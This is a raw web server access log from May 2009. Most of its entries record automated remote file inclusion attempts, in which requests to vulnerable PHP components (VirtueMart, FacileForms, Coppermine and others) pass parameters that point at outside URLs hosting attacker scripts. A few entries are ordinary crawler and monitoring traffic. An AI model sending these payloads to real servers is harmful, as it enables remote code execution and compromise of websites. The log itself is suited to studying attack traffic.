75.126.49.163 - - [25/May/2009:01:44:56 -0400] "GET ///?_SERVER[DOCUMENT_ROOT]=hhttp://www.ghetto.uz/readme.txt? HTTP/1.1" 200 453 "-" "libwww-perl/5.811"
209.59.12.99 - - [25/May/2009:01:45:16 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
65.23.158.226 - - [25/May/2009:01:45:18 -0400] "GET /logs/access_log.Q109050700//skin/zero_vote/login.php?dir=http://pdcmanagement.com///idfx1.gif??? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
65.23.158.226 - - [25/May/2009:01:45:25 -0400] "GET /logs/access_log.Q109050300//skin/zero_vote/login.php?dir=http://pdcmanagement.com///idfx1.gif??? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
221.139.50.3 - - [25/May/2009:01:45:58 -0400] "GET /logs/access_log.Q109042600%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
221.139.50.3 - - [25/May/2009:01:46:08 -0400] "GET /logs/access_log.Q109042600%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
65.23.158.226 - - [25/May/2009:01:46:12 -0400] "GET /logs/access_log.Q109050300//skin/zero_vote/login.php?dir=http://pdcmanagement.com///idfx1.gif??? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
91.121.210.42 - - [25/May/2009:01:47:04 -0400] "GET /logs//facileforms.frame.php?ff_compath=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
91.121.210.42 - - [25/May/2009:01:47:04 -0400] "GET /logs/access_log.Q108062800//facileforms.frame.php?ff_compath=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
91.121.210.42 - - [25/May/2009:01:47:04 -0400] "GET //facileforms.frame.php?ff_compath=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 220 "-" "Mozilla/5.0"
91.121.210.42 - - [25/May/2009:01:47:08 -0400] "GET /logs/access_log.Q109021500//facileforms.frame.php?ff_compath=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
216.246.124.211 - - [25/May/2009:01:47:13 -0400] "GET /logs/access_log.Q109021500//facileforms.frame.php?ff_compath=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
216.246.124.211 - - [25/May/2009:01:47:13 -0400] "GET /logs//facileforms.frame.php?ff_compath=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
216.246.124.211 - - [25/May/2009:01:47:13 -0400] "GET /logs/access_log.Q108062800//facileforms.frame.php?ff_compath=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
216.246.124.211 - - [25/May/2009:01:47:13 -0400] "GET //facileforms.frame.php?ff_compath=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 220 "-" "Mozilla/5.0"
85.214.66.22 - - [25/May/2009:01:47:16 -0400] "GET /logs//facileforms.frame.php?ff_compath=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
85.214.66.22 - - [25/May/2009:01:47:16 -0400] "GET //facileforms.frame.php?ff_compath=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 220 "-" "Mozilla/5.0"
85.214.66.22 - - [25/May/2009:01:47:16 -0400] "GET /logs/access_log.Q109021500//facileforms.frame.php?ff_compath=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
85.214.66.22 - - [25/May/2009:01:47:16 -0400] "GET /logs/access_log.Q108062800//facileforms.frame.php?ff_compath=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
67.15.188.3 - - [25/May/2009:01:47:30 -0400] "GET /logs/access_log.Q108091400//vwar/backup/errors.php?error=http://reklama-gorod.ru//assets/export/fx29id.txt?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
80.237.146.58 - - [25/May/2009:01:47:55 -0400] "GET /logs/access_log.Q108091400//facileforms.frame.php?ff_compath=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
80.237.146.58 - - [25/May/2009:01:47:55 -0400] "GET /logs/access_log.Q108022800//facileforms.frame.php?ff_compath=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
91.121.210.42 - - [25/May/2009:01:48:10 -0400] "GET /logs/access_log.Q108062800%20%20//facileforms.frame.php?ff_compath=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
91.121.210.42 - - [25/May/2009:01:48:10 -0400] "GET /logs/access_log.Q109021500%20%20//facileforms.frame.php?ff_compath=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
85.214.66.22 - - [25/May/2009:01:48:10 -0400] "GET /logs/access_log.Q108062800%20%20//facileforms.frame.php?ff_compath=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
85.214.66.22 - - [25/May/2009:01:48:10 -0400] "GET /logs/access_log.Q109021500%20%20//facileforms.frame.php?ff_compath=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
212.72.187.132 - - [25/May/2009:01:48:18 -0400] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.omsklyvr.omit.ru/id1.txt??? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
212.72.187.132 - - [25/May/2009:01:48:18 -0400] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.omsklyvr.omit.ru/id1.txt??? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
212.72.187.132 - - [25/May/2009:01:48:18 -0400] "GET /logs/access_log.Q108062800/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.omsklyvr.omit.ru/id1.txt??? HTTP/1.1" 404 283 "-" "Mozilla/5.0"
67.15.188.3 - - [25/May/2009:01:48:22 -0400] "GET /logs/access_log.Q109051000//vwar/backup/errors.php?error=http://reklama-gorod.ru//assets/export/fx29id.txt?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
88.84.130.178 - - [25/May/2009:01:48:22 -0400] "GET //facileforms.frame.php?ff_compath=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 220 "-" "Mozilla/5.0"
88.84.130.178 - - [25/May/2009:01:48:22 -0400] "GET /logs/access_log.Q108062800//facileforms.frame.php?ff_compath=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
212.72.187.132 - - [25/May/2009:01:48:23 -0400] "GET /logs/access_log.Q108052200/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.omsklyvr.omit.ru/id1.txt??? HTTP/1.1" 404 283 "-" "Mozilla/5.0"
88.84.130.178 - - [25/May/2009:01:48:23 -0400] "GET /logs//facileforms.frame.php?ff_compath=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
88.84.130.178 - - [25/May/2009:01:48:24 -0400] "GET /logs/access_log.Q109021500//facileforms.frame.php?ff_compath=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
216.246.124.211 - - [25/May/2009:01:48:28 -0400] "GET /logs/access_log.Q108062800%20%20//facileforms.frame.php?ff_compath=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
216.246.124.211 - - [25/May/2009:01:48:28 -0400] "GET /logs/access_log.Q109021500%20%20//facileforms.frame.php?ff_compath=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
67.15.188.3 - - [25/May/2009:01:48:30 -0400] "GET /logs/access_log.Q108091400//vwar/backup/errors.php?error=http://reklama-gorod.ru//assets/export/fx29id.txt?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
208.64.202.134 - - [25/May/2009:01:48:37 -0400] "GET /logs/access_log.Q109050300%20%20//skin/zero_vote/login.php?dir=http://pdcmanagement.com///idfx1.gif??? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
208.64.202.134 - - [25/May/2009:01:48:37 -0400] "GET /logs/access_log.Q109050300%20%20//skin/zero_vote/login.php?dir=http://pdcmanagement.com///idfx1.gif??? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
207.182.143.50 - - [25/May/2009:01:48:39 -0400] "GET /logs/access_log.Q108091400//vwar/backup/errors.php?error=http://reklama-gorod.ru//assets/export/fx29id.txt?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
212.72.187.132 - - [25/May/2009:01:49:11 -0400] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.omsklyvr.omit.ru/id1.txt??? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
212.72.187.132 - - [25/May/2009:01:49:11 -0400] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.omsklyvr.omit.ru/id1.txt??? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
212.72.187.132 - - [25/May/2009:01:49:11 -0400] "GET /logs/access_log.Q108052200/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.omsklyvr.omit.ru/id1.txt??? HTTP/1.1" 404 283 "-" "Mozilla/5.0"
212.72.187.132 - - [25/May/2009:01:49:14 -0400] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.omsklyvr.omit.ru/id1.txt??? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
212.72.187.132 - - [25/May/2009:01:49:14 -0400] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.omsklyvr.omit.ru/id1.txt??? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
212.72.187.132 - - [25/May/2009:01:49:16 -0400] "GET /logs/access_log.Q109050700/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.omsklyvr.omit.ru/id1.txt??? HTTP/1.1" 404 283 "-" "Mozilla/5.0"
67.15.188.3 - - [25/May/2009:01:49:16 -0400] "GET /logs/access_log.Q109051000//vwar/backup/errors.php?error=http://reklama-gorod.ru//assets/export/fx29id.txt?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
88.84.130.178 - - [25/May/2009:01:49:22 -0400] "GET /logs/access_log.Q108062800%20%20//facileforms.frame.php?ff_compath=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
88.84.130.178 - - [25/May/2009:01:49:22 -0400] "GET /logs/access_log.Q109021500%20%20//facileforms.frame.php?ff_compath=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
75.126.49.163 - - [25/May/2009:01:49:28 -0400] "GET /logs/error_log.Q109020700///?_SERVER[DOCUMENT_ROOT]=hhttp://www.ghetto.uz/readme.txt? HTTP/1.1" 404 226 "-" "libwww-perl/5.811"
75.126.49.163 - - [25/May/2009:01:49:28 -0400] "GET /logs///?_SERVER[DOCUMENT_ROOT]=hhttp://www.ghetto.uz/readme.txt? HTTP/1.1" 200 2764 "-" "libwww-perl/5.811"
207.182.143.50 - - [25/May/2009:01:49:55 -0400] "GET /logs/access_log.Q109051000//vwar/backup/errors.php?error=http://reklama-gorod.ru//assets/export/fx29id.txt?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
209.59.12.99 - - [25/May/2009:01:50:16 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
88.84.128.40 - - [25/May/2009:01:50:22 -0400] "GET /logs/error_log.Q108052700//modules/agendax/addevent.inc.php?agendax_path=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 257 "-" "libwww-perl/5.803"
78.40.224.155 - - [25/May/2009:01:50:56 -0400] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://booting-fever.com/booting/fx29id.txt??? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
78.40.224.155 - - [25/May/2009:01:50:56 -0400] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://booting-fever.com/booting/fx29id.txt??? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
78.40.224.155 - - [25/May/2009:01:51:00 -0400] "GET /logs/access_log.Q109010700///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://booting-fever.com/booting/fx29id.txt??? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
66.249.72.114 - - [25/May/2009:01:51:42 -0400] "GET /cgi-bin/LANSAWEB?PROCFUN+WORDPR01+FULLIMG+M37+FUNCPARMS+WEBCMP(S0020):1+WEBSSN(A0240):L208806444A618500374D080+WSEQ(S0060):1+OUITEM(A0200):5096000 HTTP/1.1" 200 27010 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.72.114 - - [25/May/2009:01:51:43 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L002981419ED016008C3C091+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
78.40.224.155 - - [25/May/2009:01:51:55 -0400] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://booting-fever.com/booting/fx29id.txt??? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
78.40.224.155 - - [25/May/2009:01:51:55 -0400] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://booting-fever.com/booting/fx29id.txt??? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
78.40.224.155 - - [25/May/2009:01:51:55 -0400] "GET /logs/access_log.Q109010700///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://booting-fever.com/booting/fx29id.txt??? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
78.40.224.155 - - [25/May/2009:01:52:55 -0400] "GET /logs/access_log.Q109010700%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://booting-fever.com/booting/fx29id.txt??? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
216.104.47.218 - - [25/May/2009:01:53:09 -0400] "GET /logs/access_log.Q108091400//facileforms.frame.php?ff_compath=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
216.104.47.218 - - [25/May/2009:01:53:09 -0400] "GET /logs/access_log.Q108022800//facileforms.frame.php?ff_compath=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
78.40.224.155 - - [25/May/2009:01:53:41 -0400] "GET /logs/access_log.Q109010700%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://booting-fever.com/booting/fx29id.txt??? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
78.40.224.155 - - [25/May/2009:01:53:55 -0400] "GET /logs/access_log.Q109011800%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://booting-fever.com/booting/fx29id.txt??? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
110.45.145.92 - - [25/May/2009:01:54:47 -0400] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
110.45.145.92 - - [25/May/2009:01:54:47 -0400] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
110.45.145.92 - - [25/May/2009:01:54:47 -0400] "GET /logs/access_log.Q109042200%20%20//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
110.45.145.92 - - [25/May/2009:01:54:49 -0400] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
110.45.145.92 - - [25/May/2009:01:54:49 -0400] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
110.45.145.92 - - [25/May/2009:01:54:49 -0400] "GET /logs/access_log.Q109042200%20%20//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
110.45.145.92 - - [25/May/2009:01:54:57 -0400] "GET /logs/access_log.Q108091400%20%20//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
78.40.224.155 - - [25/May/2009:01:54:57 -0400] "GET /logs/access_log.Q109011800%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://booting-fever.com/booting/fx29id.txt??? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
110.45.145.92 - - [25/May/2009:01:55:00 -0400] "GET /logs/access_log.Q108091400%20%20//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
72.30.142.171 - - [25/May/2009:01:55:12 -0400] "GET /images/Office%20Supply/ HTTP/1.0" 200 3623 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
88.84.128.40 - - [25/May/2009:01:55:15 -0400] "GET /logs/access_log.Q108110500//modules/coppermine/themes/coppercop/theme.php?THEME_DIR=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 271 "-" "libwww-perl/5.803"
88.84.128.40 - - [25/May/2009:01:55:16 -0400] "GET //modules/coppermine/themes/coppercop/theme.php?THEME_DIR=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 244 "-" "libwww-perl/5.803"
209.59.12.99 - - [25/May/2009:01:55:16 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
88.84.128.40 - - [25/May/2009:01:55:16 -0400] "GET /logs//modules/coppermine/themes/coppercop/theme.php?THEME_DIR=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 249 "-" "libwww-perl/5.803"
88.84.128.40 - - [25/May/2009:01:56:06 -0400] "GET /logs/error_log.Q108061700//modules/coppermine/themes/coppercop/theme.php?THEME_DIR=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 270 "-" "libwww-perl/5.803"
78.40.224.155 - - [25/May/2009:01:56:42 -0400] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://booting-fever.com/booting/fx29id.txt??? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
78.40.224.155 - - [25/May/2009:01:56:42 -0400] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://booting-fever.com/booting/fx29id.txt??? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
78.40.224.155 - - [25/May/2009:01:57:32 -0400] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://booting-fever.com/booting/fx29id.txt??? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
78.40.224.155 - - [25/May/2009:01:57:32 -0400] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://booting-fever.com/booting/fx29id.txt??? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
221.139.104.104 - - [25/May/2009:01:57:41 -0400] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.dwno.or.kr/bbs/config/id1.txt?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
221.139.104.104 - - [25/May/2009:01:57:41 -0400] "GET /logs/access_log.Q109051100%20%20//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.dwno.or.kr/bbs/config/id1.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
221.139.104.104 - - [25/May/2009:01:57:41 -0400] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.dwno.or.kr/bbs/config/id1.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
121.173.130.41 - - [25/May/2009:01:57:46 -0400] "GET //modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://rss.jiaoshi.com.cn/data/cache/cq/eclass/copyright.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
121.173.130.41 - - [25/May/2009:01:57:46 -0400] "GET /logs/access_log.Q108110700//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://rss.jiaoshi.com.cn/data/cache/cq/eclass/copyright.txt?? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
121.173.130.41 - - [25/May/2009:01:57:46 -0400] "GET /logs//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://rss.jiaoshi.com.cn/data/cache/cq/eclass/copyright.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
222.239.76.25 - - [25/May/2009:01:57:49 -0400] "GET /logs/access_log.Q109042200///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
222.239.76.25 - - [25/May/2009:01:57:49 -0400] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
222.239.76.25 - - [25/May/2009:01:57:49 -0400] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
121.173.130.41 - - [25/May/2009:01:57:58 -0400] "GET /logs/access_log.Q109010400//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://rss.jiaoshi.com.cn/data/cache/cq/eclass/copyright.txt?? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
88.191.103.144 - - [25/May/2009:01:57:59 -0400] "GET /logs/access_log.Q108110500//modules/coppermine/themes/coppercop/theme.php?THEME_DIR=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 271 "-" "libwww-perl/5.825"
88.191.103.144 - - [25/May/2009:01:58:00 -0400] "GET //modules/coppermine/themes/coppercop/theme.php?THEME_DIR=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 244 "-" "libwww-perl/5.825"
88.191.103.144 - - [25/May/2009:01:58:00 -0400] "GET /logs//modules/coppermine/themes/coppercop/theme.php?THEME_DIR=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 249 "-" "libwww-perl/5.825"
222.239.76.25 - - [25/May/2009:01:58:07 -0400] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
222.239.76.25 - - [25/May/2009:01:58:07 -0400] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
222.239.76.25 - - [25/May/2009:01:58:17 -0400] "GET /logs/access_log.Q109042200%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
88.191.103.144 - - [25/May/2009:01:58:53 -0400] "GET /logs/error_log.Q108061700//modules/coppermine/themes/coppercop/theme.php?THEME_DIR=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 270 "-" "libwww-perl/5.825"
208.64.202.134 - - [25/May/2009:01:59:07 -0400] "GET /logs/access_log.Q109050700//skin/zero_vote/login.php?dir=http://pdcmanagement.com///idfx1.gif??? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
208.64.202.134 - - [25/May/2009:01:59:10 -0400] "GET /logs/access_log.Q109050700//skin/zero_vote/login.php?dir=http://pdcmanagement.com///idfx1.gif??? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
209.59.12.99 - - [25/May/2009:02:00:15 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
121.173.130.41 - - [25/May/2009:02:00:35 -0400] "GET /logs/access_log.Q108110700%20%20//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://rss.jiaoshi.com.cn/data/cache/cq/eclass/copyright.txt?? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
121.173.130.41 - - [25/May/2009:02:00:36 -0400] "GET /logs/access_log.Q109010400%20%20//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://rss.jiaoshi.com.cn/data/cache/cq/eclass/copyright.txt?? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
208.64.202.134 - - [25/May/2009:02:00:54 -0400] "GET /logs/access_log.Q109050300//skin/zero_vote/login.php?dir=http://pdcmanagement.com///idfx1.gif??? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
208.64.202.134 - - [25/May/2009:02:00:54 -0400] "GET /logs/access_log.Q109050300//skin/zero_vote/login.php?dir=http://pdcmanagement.com///idfx1.gif??? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
220.181.7.97 - - [25/May/2009:02:02:26 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
216.104.47.218 - - [25/May/2009:02:02:37 -0400] "GET /logs/access_log.Q108022800//facileforms.frame.php?ff_compath=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
216.104.47.218 - - [25/May/2009:02:02:42 -0400] "GET /logs/access_log.Q108091400//facileforms.frame.php?ff_compath=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
216.246.124.211 - - [25/May/2009:02:02:53 -0400] "GET /logs/access_log.Q108091400//facileforms.frame.php?ff_compath=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
216.246.124.211 - - [25/May/2009:02:02:53 -0400] "GET /logs/access_log.Q108022800//facileforms.frame.php?ff_compath=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
123.125.64.38 - - [25/May/2009:02:03:21 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
222.239.76.25 - - [25/May/2009:02:04:22 -0400] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
222.239.76.25 - - [25/May/2009:02:04:22 -0400] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
222.239.76.25 - - [25/May/2009:02:04:22 -0400] "GET /logs/access_log.Q109042200///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
209.59.12.99 - - [25/May/2009:02:05:16 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
91.121.210.42 - - [25/May/2009:02:05:35 -0400] "GET /logs/access_log.Q108091400//facileforms.frame.php?ff_compath=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
91.121.210.42 - - [25/May/2009:02:05:35 -0400] "GET /logs/access_log.Q108022800//facileforms.frame.php?ff_compath=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
222.239.76.25 - - [25/May/2009:02:06:00 -0400] "GET /logs/access_log.Q109042200%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
222.239.76.25 - - [25/May/2009:02:07:55 -0400] "GET /logs/access_log.Q109050300///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
212.33.197.126 - - [25/May/2009:02:08:18 -0400] "GET /images/psearch_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; InfoPath.1)"
212.33.197.126 - - [25/May/2009:02:08:18 -0400] "GET /images/login_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; InfoPath.1)"
212.33.197.126 - - [25/May/2009:02:08:47 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; InfoPath.1)"
